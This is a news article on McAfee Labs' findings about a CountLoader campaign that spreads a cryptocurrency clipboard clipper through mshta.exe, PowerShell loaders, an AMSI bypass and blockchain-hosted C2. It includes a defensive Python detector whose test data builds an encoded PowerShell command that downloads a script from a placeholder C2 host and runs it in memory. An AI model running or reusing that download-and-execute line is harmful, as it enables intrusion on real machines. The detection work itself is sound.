Infection Chain | Image: McAfee Labs
A sprawling cybercriminal operation has been intercepted, but not before thousands of machines were quietly infected by a highly evasive malware designed to hijack cryptocurrency transactions mid-clipboard.
A new investigation has revealed a highly sophisticated and multi-layered threat targeting cryptocurrency users. McAfee Labs has recently uncovered a large-scale CountLoader campaign that uses multiple layers of obfuscation and staged payload delivery to evade detection and maintain persistence on infected systems.
The attackers behind this campaign are not relying on a single, easily detectable malicious file. Instead, they utilize a “Russian-doll” style infection process that unpacks itself entirely in the victim’s system memory.
The infection chain is a masterclass in modern evasion, relying on multiple stages of scripts and memory injection. The process begins with obfuscated JavaScript executed through legitimate Windows tools like mshta.exe, which then triggers a sequence of PowerShell loaders.
The malware acts as a simple packer whose “primary function is to decrypt and execute another PowerShell script”.
To ensure the final malicious payload can run undetected, the attackers actively sabotage Windows security features. “Before performing the injection, the script disables AMSI (Antimalware Scan Interface) using script from GitHub – S3cur3Th1sSh1t/Amsi-Bypass-Powershell,” the report noted. Once the system is blinded, the script injects shellcode directly into a legitimate running process, entirely avoiding the hard drive.
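The mshta.exe-to-PowerShell loader chain described above is the kind of behaviour a defender can pick out of process-creation telemetry. The following Python is an added example written for this article, not McAfee's tooling: it walks a constructed set of events shaped like Sysmon Event ID 1 fields, finds PowerShell processes whose parent is mshta.exe, decodes an -EncodedCommand argument and flags loader traits (hidden window, execution-policy bypass, in-memory IEX, network fetch, AMSI references). The events, the `c2.example.invalid` host and the `inspect()` helper are all assumptions for illustration.

```python
import base64
import re

def encode_ps(script):
    # Build a -EncodedCommand value (base64 of UTF-16LE); used only to construct the sample event.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_ps(blob):
    # Decode a -EncodedCommand argument; returns "" when the argument is not valid base64/UTF-16LE.
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

# Constructed process-creation events shaped like Sysmon Event ID 1 fields (not real telemetry).
STAGE2 = "$s=(New-Object Net.WebClient).DownloadString('http://c2.example.invalid/Amsi-Bypass.ps1'); IEX $s"
EVENTS = [
    {"pid": 4100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 4212, "ppid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\u\AppData\Local\Temp\doc.hta"},
    {"pid": 4380, "ppid": 4212, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc " + encode_ps(STAGE2)},
    {"pid": 5001, "ppid": 4100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\ops\inventory.ps1"},
]
SUSPICIOUS_ARGS = {"-w hidden": "hidden window", "-ep bypass": "execution policy bypass", "-nop": "no profile"}

def inspect(events):
    """Return [(pid, reasons)] for every PowerShell process whose parent is mshta.exe, scoring
    the command line and the decoded -enc payload for the loader traits the report describes."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if not e["image"].lower().endswith("\\powershell.exe") or not parent \
                or not parent["image"].lower().endswith("\\mshta.exe"):
            continue  # only the mshta.exe -> PowerShell chain is in scope here
        cmd = e["cmdline"]
        reasons = ["spawned by mshta.exe"] + [v for k, v in SUSPICIOUS_ARGS.items() if k in cmd.lower()]
        m = re.search(r"-enc(?:odedcommand)?\s+(\S+)", cmd, re.I)
        script = decode_ps(m.group(1)) if m else cmd  # inspect the decoded script, not the base64 blob
        if re.search(r"\b(iex|invoke-expression)\b", script, re.I):
            reasons.append("in-memory execution via IEX")
        if re.search(r"downloadstring|invoke-webrequest|net\.webclient", script, re.I):
            reasons.append("fetches next stage from network")
        if "amsi" in script.lower():  # catches unobfuscated references such as a bypass script name
            reasons.append("possible AMSI tampering")
        findings.append((e["pid"], reasons))
    return findings
```

The benign PowerShell launched from explorer.exe produces no finding, which is the point of keying on the parent process rather than on powershell.exe alone.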
The ultimate goal of this elaborate, stealthy infrastructure is financial theft. The final payload deployed into memory is a “cryptocurrency clipper”. This malware silently monitors the victim’s clipboard. The moment a user copies a cryptocurrency wallet address to make a transaction, the malware swaps it out for an address controlled by the attackers, seamlessly redirecting the funds.
Adding to the sophistication is how the malware communicates with its operators. To avoid having their command-and-control (C2) servers easily blocked by security software, the attackers use a novel blockchain-based evasion tactic.
“It starts by fetching the C2 server address, which it gets by a technique called EtherHiding, where the C2 server address is fetched from Ethereum blockchain,” the researchers detailed.
Despite the advanced evasion techniques, McAfee researchers successfully disrupted the operation. By identifying and registering a backup domain hardcoded into the malware, the security team was able to “sinkhole” the malicious traffic.
This defensive technique redirected the compromised hosts away from the attackers and onto a researcher-controlled server, effectively neutralizing the immediate threat for those users while revealing the massive scale of the campaign—with thousands of infected machines phoning home.